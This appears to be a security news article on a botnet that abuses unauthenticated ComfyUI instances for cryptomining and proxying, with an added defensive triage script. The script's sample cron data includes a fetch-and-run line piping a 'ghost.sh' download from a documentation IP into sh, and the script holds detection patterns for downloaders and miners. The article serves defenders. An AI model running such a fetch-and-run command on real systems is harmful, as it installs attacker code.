Ethical Hacking News
A new botnet campaign is targeting internet-exposed instances of ComfyUI, a popular node-based interface for Stable Diffusion and similar image-generation models. The attackers abuse unauthenticated remote code execution through custom nodes to mine cryptocurrency and to enlist the compromised hosts in a proxy botnet. They use a purpose-built Python scanner that continuously sweeps major cloud IP ranges for vulnerable targets; each compromised host is added to a cryptomining operation (Monero and Conflux) and to a Hysteria V2 proxy botnet, both run from the same command-and-control infrastructure. With more than 1,000 publicly accessible ComfyUI instances, the pool of targets is small but large enough to matter to defenders. In this article, we walk through the details of the ComfyUI botnet and its tactics, techniques, and procedures (TTPs).
According to Censys security researcher Mark Ellzey, an active campaign has been observed targeting internet-exposed instances running ComfyUI to enlist them into a cryptocurrency mining and proxy botnet. The attackers use a purpose-built Python scanner that continuously sweeps major cloud IP ranges for vulnerable targets, automatically installing malicious nodes via ComfyUI-Manager if no exploitable node is already present.
The attack activity systematically scans for exposed ComfyUI instances and abuses a misconfiguration, an unauthenticated deployment reachable from the internet, that allows remote code execution through custom nodes. Upon successful exploitation, the compromised hosts are added to a cryptomining operation that mines Monero using XMRig and Conflux using lolMiner, as well as to a Hysteria V2 proxy botnet. Both botnets are centrally managed through a Flask-based command-and-control (C2) dashboard.
Censys's attack surface data shows more than 1,000 publicly accessible ComfyUI instances. While not an enormous number, it is sufficient for a threat actor to run opportunistic campaigns for financial gain.
The attackers have also created a malicious package called "ComfyUI-Shell-Executor" that fetches a next-stage shell script ("ghost.sh") from an attacker-controlled IP address. Once code execution is obtained, the scanner removes evidence of the exploit by clearing the ComfyUI prompt history, so defenders should not treat the in-app history as a reliable record of what was run.
A newer version of the scanner adds persistence: the shell script is re-downloaded every six hours and the exploit workflow is re-executed every time ComfyUI starts. The shell script disables shell history, kills competing miners, launches the miner, and uses an LD_PRELOAD hook to hide a watchdog process that revives the miner if it is terminated.
The malware also uses further persistence mechanisms, including copying the miner binary to multiple locations and setting the immutable attribute with "chattr +i" so the binaries cannot be deleted, modified, or renamed, even by root, until the attribute is cleared again with "chattr -i".
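Turning the persistence and anti-forensics described in the last three paragraphs into a host check, here is an added triage script (written for this article, not code from Censys, the ComfyUI project, or the campaign itself). It runs offline over constructed sample artefacts; the indicators it keys on come from the text above (the ComfyUI-Shell-Executor node, ghost.sh, XMRig and lolMiner, a six-hourly cron job, an /etc/ld.so.preload entry, chattr +i, and ComfyUI listening on a non-loopback address), while every path, IP address, process line and helper name is an assumption for illustration.

```python
"""Offline triage for the ComfyUI miner/proxy campaign indicators discussed above.

Added example, not code from the report or the ComfyUI project. On a real host,
feed it the output of `ps axo args`, `crontab -l` and /etc/cron.d, the contents
of /etc/ld.so.preload, `lsattr -R`, and a listing of ComfyUI/custom_nodes.
All sample data below is constructed for illustration."""
import re
from dataclasses import dataclass

KNOWN_BAD_NODES = {"comfyui-shell-executor"}   # named in the report
KNOWN_BAD_SCRIPTS = {"ghost.sh"}               # named in the report
MINER_NAMES = {"xmrig", "lolminer"}            # named in the report
LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# a cron job that pulls a script from a bare IP with curl/wget
DOWNLOADER = re.compile(r"\b(curl|wget)\b.*https?://\d{1,3}(?:\.\d{1,3}){3}")


@dataclass
class Finding:
    category: str
    detail: str


def check_custom_nodes(node_dirs):
    """Flag the malicious custom node package named in the report."""
    return [Finding("malicious_node", d) for d in node_dirs
            if d.lower() in KNOWN_BAD_NODES]


def check_processes(ps_lines):
    """Flag miner processes and a ComfyUI server bound to a non-loopback address.
    ComfyUI's --listen defaults to 127.0.0.1; a bare --listen binds all interfaces."""
    findings = []
    for line in ps_lines:
        low = line.lower()
        if any(m in low for m in MINER_NAMES):
            findings.append(Finding("miner_process", line))
        m = re.search(r"--listen(?:[= ](\S+))?", line)
        if "main.py" in low and m:
            addr = m.group(1) or ""
            if addr.startswith("--"):   # captured the next flag: --listen was bare
                addr = ""
            addr = addr or "0.0.0.0"
            if addr not in LOOPBACK and not addr.startswith("127."):
                findings.append(Finding("exposed_listener", addr))
    return findings


def check_cron(cron_lines):
    """Flag six-hourly jobs and jobs that fetch a script (or ghost.sh) from an IP."""
    findings = []
    for line in cron_lines:
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if len(fields) >= 6 and fields[1] == "*/6" and fields[2:5] == ["*", "*", "*"]:
            findings.append(Finding("cron_six_hourly", line))
        if any(s in line for s in KNOWN_BAD_SCRIPTS) or DOWNLOADER.search(line):
            findings.append(Finding("cron_downloader", line))
    return findings


def check_ld_preload(preload_lines):
    """Any entry in /etc/ld.so.preload deserves review; the watchdog hides behind one."""
    return [Finding("ld_preload", l.strip()) for l in preload_lines
            if l.strip() and not l.lstrip().startswith("#")]


def check_immutable(lsattr_lines):
    """Parse `lsattr -R` output; a lowercase 'i' in the attribute field means chattr +i."""
    findings = []
    for line in lsattr_lines:
        parts = line.split(None, 1)          # "directory:" header lines have no path field
        if len(parts) == 2 and "i" in parts[0]:
            findings.append(Finding("immutable_file", parts[1]))
    return findings


def triage(node_dirs, ps_lines, cron_lines, preload_lines, lsattr_lines):
    return (check_custom_nodes(node_dirs) + check_processes(ps_lines)
            + check_cron(cron_lines) + check_ld_preload(preload_lines)
            + check_immutable(lsattr_lines))


def summarize(findings):
    """Count findings per category."""
    counts = {}
    for f in findings:
        counts[f.category] = counts.get(f.category, 0) + 1
    return counts


# Constructed sample artefacts (203.0.113.0/24 is the RFC 5737 documentation range).
SAMPLE_NODES = ["ComfyUI-Manager", "ComfyUI-Shell-Executor", "comfyui_controlnet_aux"]
SAMPLE_PS = [
    "python3 main.py --listen --port 8188",
    "/tmp/.x/xmrig -o pool.invalid:3333 --donate-level 0",
]
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 */6 * * * curl -fsSL http://203.0.113.5/ghost.sh | sh",
    "@reboot /usr/bin/true",
]
SAMPLE_PRELOAD = ["/usr/local/lib/libsystem.so"]
SAMPLE_LSATTR = [
    "/usr/bin:",
    "----i---------e------- /usr/bin/.xmrig",
    "--------------e------- /usr/bin/python3",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_NODES, SAMPLE_PS, SAMPLE_CRON, SAMPLE_PRELOAD, SAMPLE_LSATTR):
        print(f"[{f.category}] {f.detail}")
```

One caveat when using this on a live host: an LD_PRELOAD hook hides the watchdog from any dynamically linked tool that reads /proc, including ps and lsattr, so collect the inputs with a statically linked binary (a static busybox, for instance) or from a disk image mounted offline, and treat a non-empty /etc/ld.so.preload as the first thing to investigate rather than the last.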
The attackers have also targeted a specific competitor, "Hisana", which is referenced throughout the code. The malicious package overwrites Hisana's configuration to redirect its mining output to the attacker's wallet address and occupies Hisana's C2 port with a dummy Python listener so that Hisana can't restart.
Separately from the ComfyUI campaign, other recently reported activity has exploited known security vulnerabilities to deploy Condi, a Linux malware that turns compromised devices into bots capable of conducting distributed denial-of-service (DDoS) attacks, and has brute-forced SSH servers to mine cryptocurrency as part of an active cryptojacking operation tracked as Monaco.
The discovery of the ComfyUI botnet coincides with the emergence of multiple botnet campaigns in recent weeks, including the exploitation of command injection vulnerabilities in n8n and Tenda AC1206 routers to enlist them in a Mirai-based botnet known as Zerobot. Exploitation of vulnerabilities in Apache ActiveMQ, Metabase, and React Server Components has also been observed delivering Kinsing, a long-running malware family used for cryptocurrency mining and launching DDoS attacks.
Much of the observed bot and node activity is located in the United States, and the rise is linked to the public availability of botnet source code such as Mirai's. Mirai offshoots and variants are responsible for some of the largest DDoS attacks by volume.
In conclusion, the ComfyUI botnet uses internet-exposed, unauthenticated ComfyUI instances as its initial access vector and then layers persistence (a six-hourly cron job, re-execution on ComfyUI startup, an LD_PRELOAD-hidden watchdog, and immutable binaries) on top of its mining and proxy payloads. Combined with the clearing of prompt and shell history, these mechanisms make the intrusion harder to detect and clean up. The practical mitigation is not to expose ComfyUI without authentication: keep it bound to localhost or behind an authenticating reverse proxy, and audit the custom nodes installed on any instance that has been reachable from the internet.
Related Information:
https://www.ethicalhackingnews.com/articles/ComfyUI-Botnet-A-New-Vector-for-Cryptocurrency-Mining-and-Remote-Code-Execution-ehn.shtml
https://thehackernews.com/2026/04/over-1000-exposed-comfyui-instances.html
https://censys.com/blog/comfyui-servers-cryptomining-proxy-botnet/
https://www.bleepingcomputer.com/news/security/new-condi-malware-builds-ddos-botnet-out-of-tp-link-ax21-routers/
https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
https://cybersecuritynews.com/new-condibot-variant-and-monaco-cryptominer/
https://netcrook.com/condibot-monaco-malware-network-hardware-attacks/
https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces
https://www.tenable.com/blog/kinsing-malware-hides-itself-as-a-manual-page-and-targets-cloud-servers
https://fortiguard.fortinet.com/outbreak-alert/zerobot-attack
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/ZeroBot!MTB
Published: Tue Apr 7 09:51:54 2026 by llama3.2 3B Q4_K_M